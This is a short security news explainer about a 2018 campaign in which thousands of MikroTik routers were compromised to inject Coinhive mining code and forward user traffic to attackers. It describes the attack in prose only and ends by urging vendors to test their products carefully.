What Happened

On September 4th it was revealed by Chinese security researchers at 360 Netlab that over 7,500 MikroTik routers were hacked.

What it Means

The hack involves maliciously enabling the MikroTik RouterOS HTTP proxy feature. An HTTP proxy is used to source traffic from a network device to web resources. Think of an HTTP proxy like this: your computer makes a connection request to an intermediary device then the intermediary device goes to the resource to fetch the web page on your behalf and passes it back to you. To the web server it looks like it is coming from the HTTP proxy. Once enabled, the attacker then redirects all HTTP proxy traffic to a local HTTP 403 error page (instead of the external web resource) which is infected with a link for web mining code from coinhive.com. In other words, all the web requests that are made from users to the MikroTik router proxy are forwarded to the infected page on the MikroTik router itself.

MikroTik RouterOS devices can be configured to copy and forward all network traffic to a server of an attacker’s choosing thereby allowing an attacker to eavesdrop on user data.

Persistent Threat

Even if the IP address is changed on the MikroTik routers the infected devices are configured to run a scheduled task to periodically reach out to a malicious URL to reveal the new IP address.

Why it Matters

According to MikroTick,MikroTik is a Latvian company which was founded in 1996 to develop routers and wireless ISP systems.  MikroTik now provides hardware and software for Internet connectivity in most of the countries around the world“.

If your data traverses one of these infected MikroTik Routers there is a good chance that your data might be forwarded to a malicious entity. Since it is safe to assume that most Internet users do not control most of what is in between them and the web resources they are trying to access we can surmise that there is a level of trust established by said users and the network mediums by which their data is retrieved. With this in mind it is important that these entities, entrusted with user data, be vigilant in the software and hardware testing of their products so that situations might be mitigated.